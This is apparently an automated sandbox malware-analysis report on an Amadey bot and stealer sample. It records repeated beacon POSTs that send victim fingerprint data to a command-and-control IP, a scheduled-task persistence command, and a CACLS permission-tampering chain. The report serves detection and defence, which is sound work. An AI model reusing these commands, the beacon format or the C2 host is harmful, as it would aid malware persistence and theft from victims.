                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  53192.168.2.550029193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:18.693800926 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  54192.168.2.550030193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:22.945043087 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  55192.168.2.550031193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:27.188958883 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  56192.168.2.550032193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:31.450035095 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  57192.168.2.550033193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:35.698836088 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  58192.168.2.550034193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:39.922708988 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  59192.168.2.550035193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:44.144380093 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  60192.168.2.550036193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:48.409323931 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:14:52:56
                  Start date:23/11/2024
                  Path:C:\Users\user\Desktop\Week13.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Week13.exe"
                  Imagebase:0x610000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000000.2018110902.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2024090733.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:1
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000002.4482643286.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.4482407558.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000002.4482643286.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000000.2023252824.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 92%, ReversingLabs
                  Reputation:low
                  Has exited:false

                  General

                  Target ID:2
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F
                  Imagebase:0x650000
                  File size:187'904 bytes
                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&Exit
                  Imagebase:0x790000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:6
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:7
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  Imagebase:0x790000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:8
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "oneetx.exe" /P "user:N"
                  Imagebase:0xe20000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:9
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "oneetx.exe" /P "user:R" /E
                  Imagebase:0xe20000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:10
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  Imagebase:0x790000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:11
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "..\cb7ae701b3" /P "user:N"
                  Imagebase:0xe20000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:12
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "..\cb7ae701b3" /P "user:R" /E
                  Imagebase:0xe20000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:13
                  Start time:14:53:01
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000002.2072680147.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000000.2068747205.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  General

                  Target ID:16
                  Start time:14:54:00
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000000.2659622976.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000002.2661827573.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  General

                  Target ID:17
                  Start time:14:55:00
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000000.3258747374.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000002.3259452857.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  General

                  Target ID:18
                  Start time:14:56:00
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000002.3859111470.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000000.3858755574.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  General

                  Target ID:19
                  Start time:14:57:00
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000000.4459397310.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.4464203230.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  Disassembly

                  No disassembly